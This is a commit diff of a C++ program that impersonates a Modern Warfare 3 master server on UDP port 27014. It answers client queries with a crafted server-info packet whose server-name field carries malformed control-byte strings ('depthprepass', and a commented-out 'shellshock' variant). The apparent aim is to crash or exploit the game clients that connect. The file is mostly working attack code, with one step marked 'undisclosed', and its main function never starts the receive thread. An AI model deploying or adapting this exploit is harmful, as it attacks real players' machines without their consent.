Init

src/main.cpp

@@ -0,0 +1,94 @@
+#include "stdinc.hpp"
+#include "main.hpp"
+
+#define MW3_SERVER_4CC 0x504F4F4C
+#define BUF_SIZE 1024
+
+SOCKET sock;
+
+bool startUp()
+{
+    WSADATA wsa_data;
+	WSAStartup(MAKEWORD(2, 2), &wsa_data);
+
+    sock = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
+    if (INVALID_SOCKET == sock)
+	{
+		printf("Can't initialize socket\n");
+		return false;
+	}
+
+    sockaddr_in service;
+	service.sin_family = AF_INET;
+	service.sin_addr.s_addr = htonl(INADDR_ANY);
+
+//  net_masterServerPort
+    service.sin_port = htons(27014);
+    int result = bind(sock, (SOCKADDR*)&service, sizeof(service));
+    if (SOCKET_ERROR == result)
+    {
+        printf("Can't bind socket\n");
+        closesocket(sock);
+        return false;
+    }
+
+
+    return true;
+}
+
+DWORD WINAPI recvTh(LPVOID)
+{
+    auto buf = std::make_unique<char[]>(BUF_SIZE);
+
+    u_long iMode = 1;
+    ioctlsocket(sock, FIONBIO, &iMode);
+
+    sockaddr_in sender{};
+	int senderSize = sizeof(sender);
+    serverInfo_t info{};
+
+//  undisclosed step
+    info.serverName_ptr = 0;
+    info.rawDataSize = INFO_MAX_DATA;
+    SecureZeroMemory(&info.rawData, info.rawDataSize);
+
+    while (1)
+    {
+        SecureZeroMemory(buf.get(), BUF_SIZE);
+        auto len = recvfrom(sock, buf.get(), BUF_SIZE, 0, (SOCKADDR*)&sender, &senderSize);
+
+        if (len == SOCKET_ERROR)
+		{
+			return -1;
+		}
+
+        if (len == sizeof(serverQuery_t))
+        {
+            auto* packet = (serverQuery_t*)buf.get();
+
+            if (packet->magic4CC == MW3_SERVER_4CC)
+            {
+                printf("Server is sending info to a client\n");
+                auto bad_string = "\x5e\x01\xCC\xCC\x0C" "depthprepass"s;
+//              auto bad_string = "\x5e\x01\xCC\xCC\x0A" "shellshock"s;
+                std::memcpy(&info.rawData[info.serverName_ptr], bad_string.data(), bad_string.length() + 1);
+                sendto(sock, (char*)&info, sizeof(serverInfo_t), 0, (SOCKADDR*)&sender, senderSize);
+            }
+        }
+#ifdef _LINUX
+        sleep(1000);
+#else
+        Sleep(1);
+#endif
+    }
+}
+
+int main(int, char**)
+{
+    if (!startUp())
+	{
+		return 1;
+	}
+
+    WSACleanup();
+}

src/main.hpp

@@ -0,0 +1,39 @@
+#pragma once
+
+#define INFO_MAX_DATA 2048
+
+#pragma pack(1)
+
+typedef struct
+{
+	uint32_t magic4CC;
+	uint32_t timeStamp;
+} serverQuery_t;
+
+typedef struct
+{
+	uint32_t magic4CC;
+	uint32_t timeStamp;
+	int32_t players;
+	int32_t maxPlayers;
+	bool bPasswordProtected;
+	uint32_t bDedicated;
+	int32_t serverVersion;
+	uint64_t SteamId;
+	uint32_t gameIP_int;
+	uint32_t gameIP_ext;
+	uint16_t gamePort;
+	uint16_t queryPort;
+	uint16_t netPort;
+	char secID[8];
+	char secKey[16];
+	uint16_t mapName_ptr;
+	uint16_t serverName_ptr;
+	uint16_t serverTags_ptr;
+	uint16_t serverInfos_ptr;
+	uint16_t rawDataSize;
+	char rawData[INFO_MAX_DATA];
+
+} serverInfo_t;
+
+#pragma pack()

src/stdinc.cpp

@@ -0,0 +1 @@
+#include "stdinc.hpp"

src/stdinc.hpp

@@ -0,0 +1,34 @@
+#ifdef _LINUX
+#pragma clang diagnostic push
+#pragma clang diagnostic ignored "-Wpragma-pack"
+#endif
+
+// defines
+#define WIN32_LEAN_AND_MEAN
+
+// windows headers
+#include <WinSock2.h>
+#include <ws2tcpip.h>
+#include <windows.h>
+#include <string>
+#include <vector>
+#include <iostream>
+#include <memory>
+#pragma comment (lib, "Ws2_32.lib")
+
+// std includes
+#include <string>
+
+#ifdef _LINUX
+#include <unistd.h>
+#endif
+
+using namespace std::literals;
+
+// c types
+
+#include <cstdint>
+
+#ifdef _LINUX
+#pragma clang diagnostic pop
+#endif